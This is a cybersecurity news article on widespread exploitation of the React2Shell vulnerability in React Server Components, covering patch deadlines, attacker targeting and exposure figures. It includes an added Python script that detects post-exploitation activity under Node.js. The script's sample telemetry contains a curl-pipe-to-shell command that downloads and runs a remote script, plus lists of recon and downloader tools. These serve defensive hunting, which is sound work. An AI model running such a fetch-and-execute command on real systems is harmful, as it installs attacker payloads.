React2Shell Exploitation Escalates into Massive-Scale International Attacks, Forcing Emergency Mitigation

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urged federal agencies to patch the recently disclosed React2Shell vulnerability by December 12, 2025, amid reports of widespread exploitation.

The critical vulnerability, tracked as CVE-2025-55182 (CVSS score: 10.0), affects the React Server Components (RSC) Flight protocol. The root cause is unsafe deserialization of attacker-controlled input, which allows an attacker to inject malicious logic that the server then executes in a privileged context. It also affects other frameworks built on RSC, including Next.js, Waku, Vite, React Router, and RedwoodSDK.

“A single, specially crafted HTTP request is sufficient; there is no authentication requirement, user interaction, or elevated permissions involved,” Cloudforce One, Cloudflare’s threat intelligence team, said. “Once successful, the attacker can execute arbitrary, privileged JavaScript on the affected server.”

Since its public disclosure on December 3, 2025, the vulnerability has been exploited by multiple threat actors in various campaigns to carry out reconnaissance and deliver a range of malware families.


The development prompted CISA to add the flaw to its Known Exploited Vulnerabilities (KEV) catalog last Friday, initially giving federal agencies until December 26 to apply the fixes. The deadline has since been moved up to December 12, 2025, a signal of the severity of the incident.


Cloud security firm Wiz said it has observed a “rapid wave of opportunistic exploitation” of the flaw, with the vast majority of attacks targeting internet-facing Next.js applications and other containerized workloads running in Kubernetes and managed cloud services.

Image source: Cloudflare

Cloudflare, which is also tracking the ongoing exploitation activity, said threat actors have run queries on internet-wide scanning and asset discovery platforms to find exposed systems running React and Next.js applications. Notably, some of the reconnaissance efforts excluded Chinese IP address ranges from their searches.

“Their highest-density probing occurred against networks in Taiwan, Xinjiang Uyghur, Vietnam, Japan, and New Zealand – regions frequently associated with geopolitical intelligence collection priorities,” the web infrastructure company said.

The observed activity is also said to have targeted, albeit more selectively, government (.gov) websites, academic research institutions, and critical-infrastructure operators. This included a national authority responsible for the import and export of uranium, rare metals, and nuclear fuel.

Some of the other notable findings are listed below –

  • Prioritizing high-sensitivity technology targets such as enterprise password managers and secure-vault services, likely with the aim of carrying out supply chain attacks
  • Targeting edge-facing SSL VPN appliances whose administrative interfaces may incorporate React-based components
  • Early scanning and exploitation attempts originated from IP addresses previously associated with Asia-affiliated threat clusters

In its own analysis of honeypot data, Kaspersky said it recorded over 35,000 exploitation attempts on a single day, December 10, 2025, with attackers first probing the system by running commands like whoami before dropping cryptocurrency miners or botnet malware families such as Mirai/Gafgyt variants and RondoDox.
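The probe-then-download sequence Kaspersky describes (a whoami-style check, then a fetch of a miner or bot payload) is a useful hunting signal on the host itself, independent of the web request that triggered it. Below is an added example, not code from the article or from any vendor it cites, that scans process-creation telemetry for reconnaissance or downloader commands whose process ancestry leads back to a Node.js server. The JSON field names (ts, pid, ppid, image, cmdline), the process names treated as Node.js servers, and the sample events are all constructed assumptions, not real telemetry.

```python
"""Flag recon or downloader processes spawned under a Node.js web server.

Added example (not from the original article). Hunts JSON-lines
process-creation events for the post-exploitation pattern described above.
The field names and the NODE_IMAGES set are assumptions; adapt them to your
EDR or auditd export.
"""
import json
import os
import re
import shlex

NODE_IMAGES = {"node", "nodejs", "next-server"}          # assumed server images
RECON = {"whoami", "id", "uname", "hostname", "cat", "ps"}
DOWNLOADERS = {"curl", "wget"}
SEP = re.compile(r"[\s;|&()]+")   # splits an `sh -c` payload into words

# Constructed sample events, one JSON object per line (not real telemetry).
# pid 1201 is the web server; 1340/1341/1377 model the probe-then-download
# chain; 2044 (an admin shell under init) and 1402 (git under node) are
# negative cases that must not be flagged.
SAMPLE_EVENTS = r"""
{"ts":"2025-12-10T09:14:02Z","pid":1201,"ppid":1,"image":"/usr/bin/node","cmdline":"node server.js"}
{"ts":"2025-12-10T09:14:09Z","pid":1340,"ppid":1201,"image":"/bin/sh","cmdline":"sh -c whoami"}
{"ts":"2025-12-10T09:14:09Z","pid":1341,"ppid":1340,"image":"/usr/bin/whoami","cmdline":"whoami"}
{"ts":"2025-12-10T09:14:31Z","pid":1377,"ppid":1201,"image":"/bin/sh","cmdline":"sh -c \"curl -fsSL http://198.51.100.7/x.sh | sh\""}
{"ts":"2025-12-10T09:14:40Z","pid":2044,"ppid":1,"image":"/usr/bin/bash","cmdline":"bash -lc whoami"}
{"ts":"2025-12-10T09:15:00Z","pid":1402,"ppid":1201,"image":"/bin/sh","cmdline":"sh -c \"git rev-parse HEAD\""}
"""


def parse_events(text):
    """Parse JSON-lines telemetry into a pid -> event map (file order kept)."""
    events = {}
    for line in text.splitlines():
        line = line.strip()
        if line:
            ev = json.loads(line)
            events[ev["pid"]] = ev
    return events


def command_words(cmdline):
    """Program names appearing anywhere in a command line, including inside
    an `sh -c "..."` payload, with paths reduced to their basename."""
    try:
        tokens = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes: fall back to a plain split
        tokens = cmdline.split()
    return {os.path.basename(w) for tok in tokens for w in SEP.split(tok) if w}


def stage_of(ev):
    """'download' outranks 'recon' when both appear; None means uninteresting."""
    words = command_words(ev["cmdline"])
    if words & DOWNLOADERS:
        return "download"
    if words & RECON:
        return "recon"
    return None


def node_ancestor(ev, events, max_depth=6):
    """Nearest Node.js ancestor of ev within max_depth hops, or None."""
    cur = ev
    for _ in range(max_depth):
        cur = events.get(cur["ppid"])
        if cur is None:
            return None
        if os.path.basename(cur["image"]) in NODE_IMAGES:
            return cur
    return None


def detect(text):
    """Return findings for recon/downloader processes descended from Node.js."""
    events = parse_events(text)
    findings = []
    for ev in events.values():
        stage = stage_of(ev)
        if stage is None:
            continue
        node = node_ancestor(ev, events)
        if node is None:            # e.g. an admin running whoami in a login shell
            continue
        findings.append({
            "ts": ev["ts"], "pid": ev["pid"], "stage": stage,
            "cmdline": ev["cmdline"], "node_pid": node["pid"],
            "node_cmdline": node["cmdline"],
        })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['ts']} pid={f['pid']} {f['stage']:8} under node pid={f['node_pid']}: {f['cmdline']}")
```

On the constructed sample this reports the `sh -c whoami` shell, its `whoami` child and the `curl ... | sh` fetch, all under pid 1201, and stays silent on the admin's `bash -lc whoami` (no Node.js ancestor) and on `git rev-parse HEAD`. Entries like cat, id and ps will be noisy on hosts where the application legitimately shells out, so tune RECON per application; a download-stage hit after a recon-stage hit from the same server process should be treated as a compromise, not a probe, given that miners and bot payloads followed the whoami checks in Kaspersky's data.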

Security researcher Rakesh Krishnan has also discovered an open directory hosted on “154.61.77[.]105:8082” that includes a proof-of-concept (PoC) exploit script for CVE-2025-55182 along with two other files –

  • “domains.txt,” which contains a list of 35,423 domains
  • “next_target.txt,” which contains a list of 596 URLs, including those of companies like Dia Browser, Starbucks, Porsche, and Lululemon

It has been assessed that the unidentified threat actor is actively scanning the internet based on the targets added to the second file, infecting hundreds of pages in the process.

According to the latest data from The Shadowserver Foundation, more than 137,200 internet-exposed IP addresses were running vulnerable code as of December 11, 2025. Of these, over 88,900 instances are located in the U.S., followed by Germany (10,900), France (5,500), and India (3,600).
